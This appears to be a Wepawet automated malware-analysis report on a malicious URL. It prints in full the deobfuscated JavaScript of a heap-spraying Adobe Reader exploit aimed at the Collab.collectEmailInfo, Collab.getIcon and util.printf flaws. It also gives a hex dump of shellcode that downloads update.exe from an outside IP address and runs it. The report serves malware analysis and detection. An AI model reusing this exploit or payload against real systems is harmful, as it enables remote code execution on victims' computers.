Wepawet

Analysis report for http://yahoo-analytics.net/laso/s.php

Sample Overview

See the report for domain yahoo-analytics.net.

Detection results

Exploits

Deobfuscation results

Evals

• var gcAKY055Ij = new Array();
  var ibglxAEzG;
  function ugSpylVv9(evgBOl8BMx, lRhUvcXY){
    while (evgBOl8BMx.length * 2 < lRhUvcXY){
      evgBOl8BMx += evgBOl8BMx;
    }
    evgBOl8BMx = evgBOl8BMx.substring(0, lRhUvcXY / 2);
    return evgBOl8BMx;
  }
  function d4hT6K4ys(g7a5SULkkI){
    if (g7a5SULkkI == 0){
      var biY5csDLZn = 0x0c0c0c0c;
      var x3s7AFSBX = new Array("%u5350%u52", "51%u57", "56%u9c55%", "u00e8%u", "0000%", 
      "u5d00%ued8", "3%u31", "0d%u6", "4c0%u40", "03%u7830%", "u8b0c%u", "0c40%u70", 
      "8b%uad1c%", "u408b%u", "eb08%", "u8b09%u", "3440%u", "408d%u8", "b7c%u", "3c40%u575", 
      "6%u5ebe%u", "0001%u0", "100%ubfee%", "u014e%", "u0000", "%uef0", "1%ud6e8%", 
      "u0001%u5f0", "0%u895e", "%u81ea%u5e", "c2%u00", "01%u520", "0%u8068%u", "0000%uf", 
      "f00%u4e", "95%u0001%", "u8900%u81e", "a%u5ec", "2%u00", "01%u3100", "%u01f6%u8a", 
      "c2%u3", "59c%u026", "3%u0000%uf", "b80%u7400%", "u8806%u3", "21c%ueb46%", "uc6ee%u3", 
      "204%u89", "00%u8", "1ea%u45c2", "%u0002%", "u5200%u95f", "f%u0152%", "u0000%uea", 
      "89%uc", "281%u", "0250%", "u0000%u5", "052%u95f", "f%u0156%u0", "000%u006a", "%u006a"
      , "%uea89%uc", "281%u01", "5e%u0000%", "u8952%u81e", "a%u78c2%", "u0002%u52", "00%u0", 
      "06a%ud0ff%", "u056a%ue", "a89%uc2", "81%u015e%u", "0000%uff", "52%u5a95%", 
      "u0001%u89", "00%u81", "ea%u5ec2%", "u0001", "%u5200%u", "8068%u", "0000%u", "ff00%u", 
      "4e95%", "u0001%u890", "0%u81ea%", "u5ec2", "%u0001%u31", "00%u01f6", "%u8ac2%u", 
      "359c%u02", "6e%u000", "0%ufb", "80%u7400%u", "8806%u3", "21c%u", "eb46%uc6", 
      "ee%u320", "4%u8900%", "u81ea%", "u45c2%", "u0002%u52", "00%u95ff%", "u0152%u00", 
      "00%ue", "a89%uc2", "81%u0", "250%u000", "0%u50", "52%u95ff", "%u0156%u00", 
      "00%u006a%", "u006a%uea", "89%uc28", "1%u015e%", "u0000", "%u8952%u8", "1ea%ua", 
      "6c2%u000", "2%u5200%u", "006a%ud", "0ff%u0", "56a%u", "ea89%uc2", "81%u015e", 
      "%u0000%u", "ff52%u5a", "95%u0001", "%u9d00%u5", "f5d%u5a5", "e%u5b", "59%uc358%", 
      "u0000%u0", "000%u0", "000%u00", "00%u0000%u", "0000%u00", "00%u0", "000%u654", 
      "7%u547", "4%u6d65", "%u507", "0%u746", "1%u4168%", "u4c00%u6", "16f%u4c64", "%u6269", 
      "%u617", "2%u7972%u0", "041%u6547", "%u5074%", "u6f72%u", "4163%u64", "64%u6572%u", 
      "7373%u570", "0%u6e69%u", "7845%u636", "5%ubb", "00%uf289%u", "f789%uc030", "%u75ae%", 
      "u29fd%u89", "f7%u3", "1f9%u", "bec0%u00", "3c%u0000%", "ub503%u0", "21b%u0000%", 
      "uad66%u8", "503%u021b", "%u0000%u", "708b%u8378", "%u1cc6", "%ub503%u", "021b%u0000", 
      "%ubd8d%", "u021f%u000", "0%u03ad%u", "1b85%u0", "002%uab00", "%u03ad%", "u1b85%", 
      "u0002%u50", "00%uadab%u", "8503%u", "021b%u00", "00%u5eab%u", "db31%u56a", "d%u85", 
      "03%u021b", "%u0000%uc", "689%u", "d789%u", "fc51%ua6f", "3%u745", "9%u5e0", 
      "4%ueb43%u", "5ee9%", "ud193%u03e", "0%u2785%u0", "002%u3100", "%u96f6", "%uad66%ue0", 
      "c1%u03", "02%u1f", "85%u0002%u", "8900%uadc6", "%u850", "3%u021b%", "u0000%ueb", 
      "c3%u0010%", "u0000%u", "0000%u0", "000%u000", "0%u000", "0%u000", "0%u000", 
      "0%u8900%u1", "b85%u00", "02%u5600", "%ue857%uff", "58%uffff%", "u5e5f%u01a", "b%u80c"
      , "e%ubb3e%", "u0274%ue", "deb%u55c3%", "u4c52%u", "4f4d%u2", "e4e%u4c", "44%u004c%", 
      "u5255%u44", "4c%u776", "f%u6c6e%", "u616f%u5", "464%u466", "f%u6c69%u", "4165%", 
      "u7500%", "u6470%u7", "461%u2e6", "5%u7865%", "u0065%u7", "263%u", "7361%u2e6", 
      "8%u6870%u", "0070%u", "7468%u70", "74%u2f3a", "%u322f", "%u3331%", "u312e%u", 
      "3336%u382e", "%u2e39%u34", "35%u6c2f", "%u6269", "%u752f", "%u6470%", "u7461%u2e6", 
      "5%u6870", "%u3f70%", "u6469%u3", "43d%u9000");
    }
    else if (g7a5SULkkI == 1){
      biY5csDLZn = 0x30303030;
      var x3s7AFSBX = new Array("%u5350%", "u5251%u", "5756%u9c5", "5%u00e8%u", "0000%u5d0", 
      "0%ued83%", "u310d%", "u64c0%u400", "3%u78", "30%u8b0c%u", "0c40%u", "708b%uad1", 
      "c%u408b", "%ueb08%", "u8b09%u34", "40%u408d", "%u8b7c%u", "3c40%u", "5756%u5", 
      "ebe%u0001", "%u0100%ubf", "ee%u014", "e%u0000%ue", "f01%ud6e", "8%u00", "01%u5f0", 
      "0%u89", "5e%u81", "ea%u5e", "c2%u0001%", "u5200%u8", "068%u00", "00%uf", "f00%u4e95%"
      , "u0001%u890", "0%u81e", "a%u5ec2%u0", "001%u3100", "%u01f6", "%u8ac", "2%u359", 
      "c%u0263%", "u0000%ufb", "80%u74", "00%u8806%", "u321c%u", "eb46%uc6e", "e%u3204", 
      "%u8900%u8", "1ea%u45", "c2%u000", "2%u520", "0%u95ff", "%u0152%", "u0000%uea8", 
      "9%uc281%u0", "250%u0000", "%u5052%u9", "5ff%u015", "6%u0000%u0", "06a%u006a%", 
      "uea89%u", "c281%u0", "15e%u00", "00%u8952", "%u81ea%u7", "8c2%u0002%", "u5200", 
      "%u006a%ud", "0ff%u05", "6a%ue", "a89%uc28", "1%u015e%", "u0000%uff", "52%u5a", 
      "95%u00", "01%u8900%u", "81ea%u5ec2", "%u0001%u", "5200%u8", "068%u000", "0%uff00%u4", 
      "e95%u0", "001%u89", "00%u81ea%u", "5ec2%u00", "01%u3100", "%u01f6%u", "8ac2%u3", 
      "59c%u026", "e%u0000%uf", "b80%u", "7400%u88", "06%u321c", "%ueb4", "6%uc6ee%", 
      "u3204%u89", "00%u81ea%u", "45c2%u000", "2%u520", "0%u95ff%", "u0152%", "u0000%uea", 
      "89%uc281", "%u0250%u", "0000%u", "5052%u95", "ff%u0156", "%u0000%u00", "6a%u006a", 
      "%uea89", "%uc281%u01", "5e%u00", "00%u8952%", "u81ea", "%ua6c2%u0", "002%u", "5200%u"
      , "006a%u", "d0ff%u05", "6a%uea89%u", "c281%u015", "e%u00", "00%uff52", "%u5a95%u00", 
      "01%u9", "d00%u5f5d", "%u5a5e", "%u5b5", "9%uc358", "%u0000%", "u0000%u000", "0%u000", 
      "0%u0000%", "u0000%", "u0000%u00", "00%u654", "7%u547", "4%u6d65%u", "5070%u", 
      "7461%u416", "8%u4c00%u", "616f%u4c6", "4%u6269%u", "6172%u7972", "%u0041%u65", 
      "47%u5074%", "u6f72%u4", "163%u6", "464%u6", "572%u7373", "%u570", "0%u6e6", "9%u7845"
      , "%u6365", "%ubb00%", "uf289%", "uf789%uc03", "0%u75a", "e%u29fd", "%u89f", "7%u31f", 
      "9%ube", "c0%u003c%", "u0000%ub50", "3%u021b", "%u0000%ua", "d66%u85", "03%u02", 
      "1b%u000", "0%u708b%u", "8378%u", "1cc6%ub5", "03%u021", "b%u000", "0%ubd", "8d%u021", 
      "f%u0000%", "u03ad%", "u1b85%u00", "02%uab", "00%u03ad%", "u1b85%", "u0002%u500", 
      "0%uadab", "%u8503", "%u021b", "%u0000%u5", "eab%udb3", "1%u56", "ad%u8503", 
      "%u021b%u0", "000%u", "c689%ud7", "89%ufc51", "%ua6f", "3%u745", "9%u5e04", "%ueb4", 
      "3%u5ee9", "%ud193%u03", "e0%u2", "785%u0002", "%u3100%u9", "6f6%ua", "d66%ue", 
      "0c1%u03", "02%u1f85", "%u0002%u89", "00%uadc", "6%u8503%u", "021b%u", "0000%", 
      "uebc3%u", "0010%u0", "000%u", "0000%u00", "00%u0000", "%u0000", "%u0000%", "u0000%u8"
      , "900%u1b85", "%u0002%u5", "600%ue85", "7%uff58%uf", "fff%u5", "e5f%u01ab%", 
      "u80ce%ubb3", "e%u0274%", "uedeb%u55c", "3%u4c5", "2%u4f4d%u", "2e4e%u4", "c44%u", 
      "004c%u52", "55%u444c", "%u776f%u6", "c6e%u616", "f%u5464%", "u466f%u6", "c69%u", 
      "4165%u750", "0%u64", "70%u7", "461%u2e65%", "u7865%u0", "065%u726", "3%u7361%", 
      "u2e68%u6", "870%u0", "070%u7468%", "u7074%", "u2f3a%u3", "22f%u3331", "%u312e%u33", 
      "36%u382e%", "u2e39%u3", "435%u6", "c2f%u", "6269%u752f", "%u6470%u7", "461%u2e65", 
      "%u6870%", "u3f70%u6", "469%u353d%", "u9000");
    }
    else if (g7a5SULkkI == 2){
      var x3s7AFSBX = new Array("%u5350", "%u5251%u5", "756%u", "9c55%u", "00e8%u000", 
      "0%u5d00%ue", "d83%u3", "10d%u64c", "0%u400", "3%u7830", "%u8b0c%", "u0c40", 
      "%u708b%u", "ad1c%u40", "8b%ueb0", "8%u8b09", "%u3440%u", "408d%u8b7", "c%u3c40", 
      "%u575", "6%u5ebe%u0", "001%u0", "100%ub", "fee%u014e", "%u0000", "%uef01%", 
      "ud6e8%u000", "1%u5f00%u8", "95e%u81", "ea%u5ec2%", "u0001%", "u5200%", "u8068%u000", 
      "0%uff0", "0%u4e95", "%u0001", "%u8900%u", "81ea%u5ec", "2%u000", "1%u3100%", "u01f6%"
      , "u8ac2", "%u359c%u02", "63%u0", "000%ufb8", "0%u7400%u8", "806%u3", "21c%ueb46", 
      "%uc6e", "e%u3204", "%u890", "0%u81ea%u4", "5c2%u0002", "%u5200", "%u95ff%u", 
      "0152%u0", "000%ue", "a89%uc", "281%u0250", "%u0000%u", "5052%u", "95ff%u", "0156%u0", 
      "000%u0", "06a%u0", "06a%ue", "a89%uc28", "1%u015e%u", "0000%u8", "952%u81ea", 
      "%u78c2", "%u000", "2%u52", "00%u0", "06a%ud", "0ff%u0", "56a%ue", "a89%uc28", 
      "1%u015e%u", "0000%uff", "52%u5a9", "5%u0001%", "u8900%u81", "ea%u5ec2%u", "0001%u52", 
      "00%u806", "8%u0000%uf", "f00%u4e9", "5%u00", "01%u890", "0%u81ea%", "u5ec2%u", 
      "0001%u3100", "%u01f", "6%u8ac2", "%u359c%u0", "26e%u000", "0%ufb80%", "u7400%u8", 
      "806%u321", "c%ueb", "46%uc6", "ee%u3204%u", "8900%u81ea", "%u45c2%u00", "02%u520", 
      "0%u95ff%", "u0152%u000", "0%uea89%uc", "281%u0250", "%u0000", "%u5052%u9", 
      "5ff%u0156", "%u000", "0%u006", "a%u006a", "%uea8", "9%uc2", "81%u0", "15e%u", 
      "0000%u895", "2%u81", "ea%ua6", "c2%u0002%", "u5200%u", "006a%ud", "0ff%u05", 
      "6a%uea89%", "uc281%u01", "5e%u00", "00%uff52", "%u5a95%u0", "001%u9d00", "%u5f5", 
      "d%u5a5e%", "u5b59%", "uc358%u0", "000%u0", "000%u0000", "%u0000%u00", "00%u000", 
      "0%u00", "00%u0000", "%u6547%", "u5474%u6d6", "5%u5070%u7", "461%u416", "8%u4c0", 
      "0%u616f%", "u4c64%", "u6269%", "u6172", "%u7972%", "u0041", "%u6547%u50", "74%u6f7", 
      "2%u4163%u6", "464%u", "6572%", "u7373%u570", "0%u6e69%u7", "845%u6", "365%ub", 
      "b00%uf", "289%u", "f789%uc", "030%u", "75ae%u29f", "d%u89", "f7%u31f", "9%ubec0%u", 
      "003c%u0", "000%ub503%", "u021b%u000", "0%uad66%u8", "503%u02", "1b%u0000%u", "708b%u"
      , "8378%u1cc", "6%ub503%", "u021b", "%u0000%u", "bd8d%u", "021f%u0", "000%u03ad%", 
      "u1b85%u", "0002%u", "ab00%u03", "ad%u1b", "85%u0", "002%u5000", "%uadab%u", 
      "8503%u021", "b%u0000%u", "5eab%udb31", "%u56ad", "%u8503%", "u021b%u000", "0%uc689", 
      "%ud789%uf", "c51%ua6f", "3%u7459%u5", "e04%ueb4", "3%u5e", "e9%ud", "193%u0", 
      "3e0%u2785%", "u0002%u3", "100%u96f6", "%uad66%ue", "0c1%u0302%", "u1f85", "%u0002", 
      "%u8900%", "uadc6", "%u850", "3%u021", "b%u00", "00%uebc3", "%u001", "0%u0000", 
      "%u0000%", "u0000%u", "0000%u00", "00%u0000", "%u0000%", "u8900%u", "1b85%u0", 
      "002%u560", "0%ue857%uf", "f58%uffff", "%u5e5", "f%u01ab%u", "80ce%ubb3", "e%u027", 
      "4%uede", "b%u55c", "3%u4c52%u", "4f4d%u2e4e", "%u4c44%", "u004c%u", "5255%u444", 
      "c%u776f%u6", "c6e%u", "616f%u5", "464%u466", "f%u6c69%u", "4165%", "u7500%u", "6470%"
      , "u7461%u2e", "65%u7865%u", "0065%u72", "63%u73", "61%u2e68%", "u6870%u007", "0%u746"
      , "8%u7074%u", "2f3a%u322f", "%u333", "1%u312e%", "u3336%", "u382e%u2e3", "9%u3435%u", 
      "6c2f%u6269", "%u752", "f%u6470%u7", "461%u2e65", "%u6870", "%u3f70%u6", "469%u363d", 
      "%u9000");
    }
    x3s7AFSBX = unescape(x3s7AFSBX.join(""));
    var oM7FMpNST4 = 0x400000;
    var zBD0g7bs = x3s7AFSBX.length * 2;
    var lRhUvcXY = oM7FMpNST4 - (zBD0g7bs + 0x38);
    var evgBOl8BMx = unescape("%u9090%u9090");
    evgBOl8BMx = ugSpylVv9(evgBOl8BMx, lRhUvcXY);
    var owE5zMSHio = (biY5csDLZn - 0x400000) / oM7FMpNST4;
    for (var ywDkkLkz = 0; ywDkkLkz < owE5zMSHio; ywDkkLkz ++ ){
      gcAKY055Ij[ywDkkLkz] = evgBOl8BMx + x3s7AFSBX;
    }
  }
  function mPrRhj4p(){
    var a6o2Chx6 = 0;
    var fQPMIrFiE = app.viewerVersion.toString();
    app.clearTimeOut(ibglxAEzG);
    if ((fQPMIrFiE >= 8 && fQPMIrFiE < 8.102) || fQPMIrFiE < 7.1){
      d4hT6K4ys(0);
      var u7Yhlt9Ex = unescape("%u0c0c%u0c0c");
      while (u7Yhlt9Ex.length < 44952)u7Yhlt9Ex += u7Yhlt9Ex;
      var gq8BJ1tFNv = this ;
      var kOntMU4wTL = Collab;
      gq8BJ1tFNv["collabStore"] = kOntMU4wTL["collectEmailInfo"]({
        subj : "", msg : u7Yhlt9Ex
      }
      );
    }
    if ((fQPMIrFiE >= 8.102 && fQPMIrFiE < 8.104) || (fQPMIrFiE >= 9 && fQPMIrFiE < 9.1) || 
    fQPMIrFiE <= 7.101){
      try {
        if (app.doc.Collab.getIcon){
          d4hT6K4ys(2);
          var d3KP2eN0B = unescape("%09");
          while (d3KP2eN0B.length < 0x4000){
            d3KP2eN0B += d3KP2eN0B;
          }
          d3KP2eN0B = "N." + d3KP2eN0B;
          var qSY3tjiUEs = app;
          qSY3tjiUEs["doc"]["Collab"]["getIcon"](d3KP2eN0B);
          a6o2Chx6 = 1;
        }
        else {
          a6o2Chx6 = 1;
        }
      }
      catch (e){
        a6o2Chx6 = 1;
      }
      if (a6o2Chx6 == 1){
        if (fQPMIrFiE == 8.102 || fQPMIrFiE == 7.1){
          d4hT6K4ys(1);
          var sMzUl6iXm = "12999999999999999999";
          for (jPyi2a1aR = 0; jPyi2a1aR < 276; jPyi2a1aR ++ ){
            sMzUl6iXm += "8";
          }
          var uOkYEZz7q = util;
          uOkYEZz7q["printf"]("%45000f", sMzUl6iXm);
        }
      }
    }
  }
  app.xVuXyCJr8 = mPrRhj4p;
  ibglxAEzG = app.setTimeOut("app.xVuXyCJr8()", 10);
  

  (repeated 2 times)

Writes

Network Activity

Requests

Redirects

ActiveX controls

• AcroPDF.PDF
  No attribute setting or method call detected

• AcrobatJavaScript
  	Name	Arg0	Count
  Methods	Collab.getIcon	N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................	1
  		N............................................................................... ................................................................................ ................................................................................ other 15840 bytes ................................................................................ ................................................................................ ................................................................................ ..................................................................	1

• ShockwaveFlash.ShockwaveFlash
  No attribute setting or method call detected

• clsid:ca8a9780-280d-11cf-a24d-444553540000
  No attribute setting or method call detected

• PDF.PdfCtrl
  No attribute setting or method call detected

Shellcode and Malware

50 53 51 52 56 57 55 9c  e8 00 00 00 00 5d 83 ed 
0d 31 c0 64 03 40 30 78  0c 8b 40 0c 8b 70 1c ad 
8b 40 08 eb 09 8b 40 34  8d 40 7c 8b 40 3c 56 57 
be 5e 01 00 00 01 ee bf  4e 01 00 00 01 ef e8 d6 
01 00 00 5f 5e 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  63 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 78 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  6e 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 a6 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 9d 5d 5f  5e 5a 59 5b 58 c3 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65 
74 54 65 6d 70 50 61 74  68 41 00 4c 6f 61 64 4c 
69 62 72 61 72 79 41 00  47 65 74 50 72 6f 63 41 
64 64 72 65 73 73 00 57  69 6e 45 78 65 63 00 bb 
89 f2 89 f7 30 c0 ae 75  fd 29 f7 89 f9 31 c0 be 
3c 00 00 00 03 b5 1b 02  00 00 66 ad 03 85 1b 02 
00 00 8b 70 78 83 c6 1c  03 b5 1b 02 00 00 8d bd 
1f 02 00 00 ad 03 85 1b  02 00 00 ab ad 03 85 1b 
02 00 00 50 ab ad 03 85  1b 02 00 00 ab 5e 31 db 
ad 56 03 85 1b 02 00 00  89 c6 89 d7 51 fc f3 a6 
59 74 04 5e 43 eb e9 5e  93 d1 e0 03 85 27 02 00 
00 31 f6 96 66 ad c1 e0  02 03 85 1f 02 00 00 89 
c6 ad 03 85 1b 02 00 00  c3 eb 10 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 89 85 1b 02 00 
00 56 57 e8 58 ff ff ff  5f 5e ab 01 ce 80 3e bb 
74 02 eb ed c3 55 52 4c  4d 4f 4e 2e 44 4c 4c 00 
55 52 4c 44 6f 77 6e 6c  6f 61 64 54 6f 46 69 6c 
65 41 00 75 70 64 61 74  65 2e 65 78 65 00 63 72 
61 73 68 2e 70 68 70 00  68 74 74 70 3a 2f 2f 32 
31 33 2e 31 36 33 2e 38  39 2e 35 34 2f 6c 69 62 
2f 75 70 64 61 74 65 2e  70 68 70 3f 69 64 3d 36 
00 90 

PSQRVWU......]..
.1.d.@0x..@..p..
.@....@4.@|.@<VW
.^......N.......
..._^....^...Rh.
.....N.......^..
.1.....5c......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R....x...R
j...j.....^...R.
.Z.......^...Rh.
.....N.......^..
.1.....5n......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R........R
j...j.....^...R.
.Z....]_^ZY[X...
..............Ge
tTempPathA.LoadL
ibraryA.GetProcA
ddress.WinExec..
....0..u.)...1..
<.........f.....
...px...........
................
...P.........^1.
.V..........Q...
Yt.^C..^.....'..
.1..f...........
................
................
.VW.X..._^....>.
t....URLMON.DLL.
URLDownloadToFil
eA.update.exe.cr
ash.php.http://2
13.163.89.54/lib
/update.php?id=6
..

50 53 51 52 56 57 55 9c  e8 00 00 00 00 5d 83 ed 
0d 31 c0 64 03 40 30 78  0c 8b 40 0c 8b 70 1c ad 
8b 40 08 eb 09 8b 40 34  8d 40 7c 8b 40 3c 56 57 
be 5e 01 00 00 01 ee bf  4e 01 00 00 01 ef e8 d6 
01 00 00 5f 5e 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  63 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 78 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 89 ea 81  c2 5e 01 00 00 52 68 80 
00 00 00 ff 95 4e 01 00  00 89 ea 81 c2 5e 01 00 
00 31 f6 01 c2 8a 9c 35  6e 02 00 00 80 fb 00 74 
06 88 1c 32 46 eb ee c6  04 32 00 89 ea 81 c2 45 
02 00 00 52 ff 95 52 01  00 00 89 ea 81 c2 50 02 
00 00 52 50 ff 95 56 01  00 00 6a 00 6a 00 89 ea 
81 c2 5e 01 00 00 52 89  ea 81 c2 a6 02 00 00 52 
6a 00 ff d0 6a 05 89 ea  81 c2 5e 01 00 00 52 ff 
95 5a 01 00 00 9d 5d 5f  5e 5a 59 5b 58 c3 00 00 
00 00 00 00 00 00 00 00  00 00 00 00 00 00 47 65 
74 54 65 6d 70 50 61 74  68 41 00 4c 6f 61 64 4c 
69 62 72 61 72 79 41 00  47 65 74 50 72 6f 63 41 
64 64 72 65 73 73 00 57  69 6e 45 78 65 63 00 bb 
89 f2 89 f7 30 c0 ae 75  fd 29 f7 89 f9 31 c0 be 
3c 00 00 00 03 b5 1b 02  00 00 66 ad 03 85 1b 02 
00 00 8b 70 78 83 c6 1c  03 b5 1b 02 00 00 8d bd 
1f 02 00 00 ad 03 85 1b  02 00 00 ab ad 03 85 1b 
02 00 00 50 ab ad 03 85  1b 02 00 00 ab 5e 31 db 
ad 56 03 85 1b 02 00 00  89 c6 89 d7 51 fc f3 a6 
59 74 04 5e 43 eb e9 5e  93 d1 e0 03 85 27 02 00 
00 31 f6 96 66 ad c1 e0  02 03 85 1f 02 00 00 89 
c6 ad 03 85 1b 02 00 00  c3 eb 10 00 00 00 00 00 
00 00 00 00 00 00 00 00  00 00 00 89 85 1b 02 00 
00 56 57 e8 58 ff ff ff  5f 5e ab 01 ce 80 3e bb 
74 02 eb ed c3 55 52 4c  4d 4f 4e 2e 44 4c 4c 00 
55 52 4c 44 6f 77 6e 6c  6f 61 64 54 6f 46 69 6c 
65 41 00 75 70 64 61 74  65 2e 65 78 65 00 63 72 
61 73 68 2e 70 68 70 00  68 74 74 70 3a 2f 2f 32 
31 33 2e 31 36 33 2e 38  39 2e 35 34 2f 6c 69 62 
2f 75 70 64 61 74 65 2e  70 68 70 3f 69 64 3d 35 
00 90 

PSQRVWU......]..
.1.d.@0x..@..p..
.@....@4.@|.@<VW
.^......N.......
..._^....^...Rh.
.....N.......^..
.1.....5c......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R....x...R
j...j.....^...R.
.Z.......^...Rh.
.....N.......^..
.1.....5n......t
...2F....2.....E
...R..R.......P.
..RP..V...j.j...
..^...R........R
j...j.....^...R.
.Z....]_^ZY[X...
..............Ge
tTempPathA.LoadL
ibraryA.GetProcA
ddress.WinExec..
....0..u.)...1..
<.........f.....
...px...........
................
...P.........^1.
.V..........Q...
Yt.^C..^.....'..
.1..f...........
................
................
.VW.X..._^....>.
t....URLMON.DLL.
URLDownloadToFil
eA.update.exe.cr
ash.php.http://2
13.163.89.54/lib
/update.php?id=5
..

Additional (potential) malware: